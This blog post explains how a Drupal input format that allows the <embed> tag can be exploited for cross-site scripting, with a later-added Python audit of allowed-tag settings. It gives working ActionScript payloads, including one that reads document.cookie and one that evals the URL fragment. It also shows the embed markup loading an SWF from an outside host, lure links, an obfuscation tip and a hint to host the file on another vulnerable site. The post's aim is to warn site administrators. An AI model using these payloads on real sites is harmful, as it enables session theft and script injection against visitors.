Heine


Using <embed> for XSS

Heine — Fri, 30/10/2009 - 18:38

I see far fewer stray <script> tags in the "Allowed HTML tags:" setting of the HTML filter these days. The <embed> tag, however, is something I still see a lot in misconfigured input formats.

It's rather easy to exploit such a format to execute JavaScript with a little bit of ActionScript:

class Main
{
  static function main(){
    // Runs as soon as the SWF is loaded; the page never has to call into it.
    // getURL with a javascript: URL executes the script in the origin of the
    // HTML page that embeds the SWF, provided AllowScriptAccess permits it.
    getURL('javascript:alert(document.cookie)');
  }
}

Build it with an ActionScript 2 compiler (e.g. the Flex SDK), upload the SWF to a convenient location *), then make a post on the site that was so careless as to allow the <embed> tag:

<embed width="0" height="0" src="http://convenient-location.example.com/XSS.swf" AllowScriptAccess="always"></embed>
Excellent article, it's pleasure to read your blog ?
<a href="http://example.com/fxxgg">FOREX</a>

Now all you have to do is get the victim to follow a link to that post:

<a href="http://victims-site.example.com/your_swf_post">Spam on the forum</a>

If you can't be bothered to change your SWF file all the time, you can build a generic payload that takes its JavaScript from the URL fragment:

class Main
{
  static function main(){
    // Generic payload: evaluate whatever follows the '#' in the page URL, so a
    // single hosted SWF serves any script the attacker puts in the fragment.
    getURL('javascript:eval(document.location.hash.substr(1))');
  }
}

The victim now only has to visit a link like this one (use a URL shortener for maximum obfuscation):

<a href="http://victims-site.example.com/your_swf_post#alert('another boring alert')">Spam on the forum</a>

That's it folks. Moral of the story: don't allow <embed> in the HTML filter. If you need to embed videos, use one of the modules that insert players from trusted sources and do not let the player script the page (the AllowScriptAccess="always" attribute above is exactly what lets the SWF call into JavaScript).
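To make the moral concrete, here is an added example in Python (mine, not code from the post or from Drupal) that models the allow-list filter the walkthrough above abuses: it parses an "Allowed HTML tags" setting as the admin screen displays it, flags any allowed tag that can carry active content, and runs the spam post from the walkthrough through a misconfigured format and a corrected one. The active-content tag list, the sample post and the two setting strings are constructed for the example, and the filter is a simplified model that looks at tag names only, not Drupal's filter_xss().

```python
import re

# Tags that load or run active content or redirect the page. If any of these
# is on the allow-list, a poster can put script on the page regardless of how
# carefully attributes are filtered. (List constructed for this example.)
ACTIVE_CONTENT_TAGS = {
    "script", "embed", "object", "applet", "iframe", "frame",
    "style", "link", "meta", "base",
}


def parse_allowed_tags(setting):
    """Parse an 'Allowed HTML tags' string as Drupal shows it, e.g.
    '<a> <em> <strong>', into a set of lower-case tag names."""
    return {t.lower() for t in re.findall(r"<\s*([a-zA-Z][a-zA-Z0-9]*)\s*>", setting)}


def audit_allowed_tags(setting):
    """Return the allowed tags that can carry active content, sorted."""
    return sorted(parse_allowed_tags(setting) & ACTIVE_CONTENT_TAGS)


# Matches an opening or closing tag and captures its name.
TAG_RE = re.compile(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)[^<>]*>")


def strip_disallowed_tags(html, allowed):
    """Toy allow-list filter: drop every tag whose name is not in `allowed`
    and keep the text between tags. Drupal's real filter also inspects
    attributes and URL protocols; this model checks tag names only."""
    return TAG_RE.sub(lambda m: m.group(0) if m.group(1).lower() in allowed else "", html)


def filter_post(html, setting):
    """Run a post through the filter configured by an allowed-tags string."""
    return strip_disallowed_tags(html, parse_allowed_tags(setting))


# Constructed sample: the attacker's spam post from the walkthrough above.
SPAM_POST = (
    '<embed width="0" height="0" '
    'src="http://convenient-location.example.com/XSS.swf" '
    'AllowScriptAccess="always"></embed>\n'
    "Excellent article, it's pleasure to read your blog\n"
    '<a href="http://example.com/fxxgg">FOREX</a>'
)

# A misconfigured format with <embed> on the allow-list, and the corrected one.
MISCONFIGURED = "<a> <em> <strong> <cite> <code> <ul> <ol> <li> <embed>"
CORRECTED = "<a> <em> <strong> <cite> <code> <ul> <ol> <li>"

if __name__ == "__main__":
    print("audit misconfigured:", audit_allowed_tags(MISCONFIGURED))  # ['embed']
    print("audit corrected:   ", audit_allowed_tags(CORRECTED))      # []
    print("--- misconfigured format passes the SWF through ---")
    print(filter_post(SPAM_POST, MISCONFIGURED))
    print("--- corrected format keeps only the spam text and link ---")
    print(filter_post(SPAM_POST, CORRECTED))
```

Running the audit against each of a site's input formats is the quick check; any non-empty result means the format is exploitable exactly as described above, since no attribute rule helps once the tag itself is allowed. Note that the remaining <a> tag is a separate concern the toy model ignores: a real filter must also refuse javascript: and similar protocols in href.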

*) Bonus points if you upload the SWF to another misconfigured Drupal site! Hint: look for a site whose file upload settings read

"Only files with the following extensions may be uploaded" swf

  • Drupal
  • Input Format
  • Planet Drupal
  • Security

dalin (not verified) — Sun, 01/11/2009 - 13:27

Thanks Heine, I've often tried to find the details of why embed was dangerous but could never find them.


Copyright © 2010 by Heine Deelstra. All rights reserved.